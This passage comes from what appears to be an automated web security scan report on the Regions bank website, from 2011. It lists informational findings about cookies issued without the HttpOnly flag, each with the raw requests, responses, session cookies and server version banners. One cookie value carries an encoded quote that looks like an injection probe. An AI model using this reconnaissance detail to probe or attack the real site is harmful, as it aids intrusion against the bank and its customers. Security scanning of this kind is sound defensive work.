Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.regions.com/about_regions/protecting_self_online.rf
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255; WT_FPC=id=2d44ab3f410ebd166681305556924172:lv=1305557020647:ss=1305556924172

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R3434604483; path=/
Content-Length: 1953
Content-Type: image/gif
Last-Modified: Fri, 27 Apr 2007 20:27:22 GMT
Accept-Ranges: bytes
ETag: "c0b776a89c71:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:48:15 GMT

GIF89aX........i.UH~vI.............7E..s~i5......MLH........V.mN.    5.}..^......WJ'.....j.......Rf........m.....k.#;..l...........g...........X..l)#.hX-53*..z.p9~|g.....z.....\........D..e........L....
...[SNIP]...
8.139. http://www.regions.com/virtualmedia/img265.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /virtualmedia/img265.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /virtualmedia/img265.gif HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/get_started_lifegreen_checking.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555448118:ss=1305555382886

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Content-Length: 2126
Content-Type: image/gif
Last-Modified: Fri, 11 May 2007 21:16:37 GMT
Accept-Ranges: bytes
ETag: "c03e2a91194c71:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:31 GMT

GIF89ap.!....Z........{{{SSS...333.zy.QQ.......EE....{{.......1/.........sss....VVJJJ.

s..................        ....33.........fff.dd......<<<.........z...JJ....ffk.........

.......aa.::.......uu....>>.
...[SNIP]...
8.140. http://www.regions.com/virtualmedia/img286.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /virtualmedia/img286.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /virtualmedia/img286.jpg HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://phx.corporate-ir.net/phoenix.zhtml?c=65036&p=irol-irhome
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255; WT_FPC=id=2d44ab3f410ebd166681305556924172:lv=1305557549322:ss=1305556924172

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R3434604483; path=/
Content-Length: 30909
Content-Type: image/jpeg
Last-Modified: Thu, 17 May 2007 17:07:11 GMT
Accept-Ranges: bytes
ETag: "207831cfa598c71:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:52:31 GMT

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2007:05:17 10:31:19.........
...[SNIP]...
8.141. http://www.regions.com/wrapperHeader.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /wrapperHeader.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wrapperHeader.aspx?p=477 HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.regions.com/about_regions/IR_investorrelations.html
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255; WT_FPC=id=2d44ab3f410ebd166681305556924172:lv=1305557331806:ss=1305556924172

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R3434604483; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:52:29 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 12625


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
8.142. https://www.regions.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: WWW.REGIONS.COM-HTTP=R3434604483

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R939930197; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:42:00 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=w2u5uvedxyqp4gyfwhbipkjc; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 27843


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
8.143. https://www.regions.com/App_Themes/2010/Ems.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /App_Themes/2010/Ems.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /App_Themes/2010/Ems.css HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regions.com/
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Type: text/css
Last-Modified: Wed, 09 Mar 2011 20:07:58 GMT
Accept-Ranges: bytes
ETag: "02323af95decb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:01 GMT
Content-Length: 21952

.../*****************************/
/* Web Channel Services: Base
/*****************************/
.foo{}

/*****************************/
/* HTML General
/*****************************/
body, h
...[SNIP]...
8.144. https://www.regions.com/App_Themes/2010/img/staticBackgrounds.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /App_Themes/2010/img/staticBackgrounds.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /App_Themes/2010/img/staticBackgrounds.gif HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regions.com/App_Themes/2010/Ems.css
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Length: 799
Content-Type: image/gif
Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT
Accept-Ranges: bytes
ETag: "08edcc72c5bcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:05 GMT

GIF89a.....`............................................................................................................................................................................................
...[SNIP]...
8.145. https://www.regions.com/App_Themes/2010/img/staticFlyouts.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /App_Themes/2010/img/staticFlyouts.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App_Themes/2010/img/staticFlyouts.png HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WWW.REGIONS.COM-HTTP=R825062118; ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; WWW.REGIONS.COM-HTTPS=R492750743

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R492750743; path=/
Content-Length: 9597
Content-Type: image/png
Last-Modified: Mon, 04 Apr 2011 20:18:00 GMT
Accept-Ranges: bytes
ETag: "08cb2645f3cb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:16:21 GMT

.PNG
.
...IHDR...~.........D.......gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<..%.IDATx...].\.y......T.....,Y.E.vC.R...U/
.J.........a..r...[.I."M.."n.....F.....6.j..b..
T\....a....-.
..,...
...[SNIP]...
8.146. https://www.regions.com/App_Themes/2010/img/staticImages.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /App_Themes/2010/img/staticImages.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /App_Themes/2010/img/staticImages.gif HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regions.com/App_Themes/2010/Ems.css
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Length: 9783
Content-Type: image/gif
Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT
Accept-Ranges: bytes
ETag: "08edcc72c5bcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:06 GMT

GIF89a..^.......Y....T...z........b........d.9..q.g.i.....r........q.....]...Q..........Kk...........y..[....V........^.2yyyN.........h............>T...........m..........f9[....|.Yf.....g.....s.Ov...
...[SNIP]...
8.147. https://www.regions.com/Img/sm_558800_oo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /Img/sm_558800_oo.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Img/sm_558800_oo.gif HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regions.com/
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Length: 597
Content-Type: image/gif
Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT
Accept-Ranges: bytes
ETag: "08edcc72c5bcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:00 GMT

GIF89a    .    ....fff...!..NETSCAPE2.0.....!..    ....,....    .    ......h.i.X.oU...m.    ..!..    ....,......    ......y........2.M.Z..!..    ....,......    .....b.x...bS..
.!..    ....,......    ...........s.M.
.!..    ....,......    ....
...[SNIP]...
8.148. https://www.regions.com/JS/cmbd-jquery.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /JS/cmbd-jquery.min.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /JS/cmbd-jquery.min.js HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regions.com/
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Length: 73452
Content-Type: application/x-javascript
Last-Modified: Wed, 27 Apr 2011 18:41:00 GMT
Accept-Ranges: bytes
ETag: "04635a7a5cc1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:01 GMT

...//*********** jquery-1.4.2.min.js *******
(function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.aj
...[SNIP]...
8.149. https://www.regions.com/JS/loadMedia.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /JS/loadMedia.min.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /JS/loadMedia.min.js HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regions.com/
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Type: application/x-javascript
Last-Modified: Tue, 05 Apr 2011 18:24:58 GMT
Accept-Ranges: bytes
ETag: "039b9c4bef3cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:01 GMT
Content-Length: 35261

...var agt=navigator.userAgent.toLowerCase();var is_major=parseInt(navigator.appVersion);var is_minor=parseFloat(navigator.appVersion);var is_nav=((agt.indexOf("mozilla")!=-1)&&(agt.indexOf("spoofer")
...[SNIP]...
8.150. https://www.regions.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Length: 3262
Content-Type: image/x-icon
Last-Modified: Tue, 21 Dec 2010 20:53:00 GMT
Accept-Ranges: bytes
ETag: "01e6fd51a1cb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:06 GMT

...... ..............(... ...@.........................................................................................................................................................................
...[SNIP]...
8.151. https://www.regions.com/js/_bt.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /js/_bt.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /js/_bt.js HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regions.com/
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Type: application/x-javascript
Last-Modified: Fri, 15 Apr 2011 14:08:58 GMT
Accept-Ranges: bytes
ETag: "0b994a976fbcb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:00 GMT
Content-Length: 990

//if bt_test is true before executing this script the iframe will load on uat
//
//if bt_extra is declared as an associative array before executing this script all members of the array will be added
...[SNIP]...
8.152. https://www.regions.com/js/wtbase.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /js/wtbase.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /js/wtbase.js HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regions.com/
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Type: application/x-javascript
Last-Modified: Fri, 15 Apr 2011 14:09:58 GMT
Accept-Ranges: bytes
ETag: "0ff57cd76fbcb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:02 GMT
Content-Length: 13718

function DcsInit(){
   this.dcsid="dcs4b71fc10000gs8u88h5t1k_6n2i";
   this.domain="statse.webtrendslive.com";
   this.enabled=true;
   this.exre=(function(){
       if (window.RegExp){
           return(new RegExp(
...[SNIP]...
8.153. https://www.regions.com/personal_banking.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking.rf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking.rf HTTP/1.1
Host: www.regions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WWW.REGIONS.COM-HTTP=R825062118

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R3758183026; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:19:42 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=mgah42qkrasihqzk3dk3tq45; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 27887


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
8.154. https://www.regions.com/virtualMedia/img2612.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /virtualMedia/img2612.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /virtualMedia/img2612.jpg HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WWW.REGIONS.COM-HTTP=R825062118; ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; WWW.REGIONS.COM-HTTPS=R492750743

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R492750743; path=/
Content-Length: 38403
Content-Type: image/jpeg
Last-Modified: Tue, 10 May 2011 16:53:30 GMT
Accept-Ranges: bytes
ETag: "e030abca32fcc1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:16:24 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...
8.155. https://www.regions.com/virtualMedia/img3090.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /virtualMedia/img3090.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /virtualMedia/img3090.jpg HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regions.com/
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Length: 6969
Content-Type: image/jpeg
Last-Modified: Thu, 28 Apr 2011 18:47:12 GMT
Accept-Ranges: bytes
ETag: "b0509dafd45cc1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:05 GMT

......JFIF.....d.d......Ducky.......2......Adobe.d..........................
..
.......................#"""#''''''''''.    ..    
   .        ...................................!! !!''''''''''......x....
...[SNIP]...
8.156. https://www.regions.com/virtualMedia/img3094.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /virtualMedia/img3094.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /virtualMedia/img3094.jpg HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regions.com/
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Length: 19053
Content-Type: image/jpeg
Last-Modified: Fri, 29 Apr 2011 12:26:29 GMT
Accept-Ranges: bytes
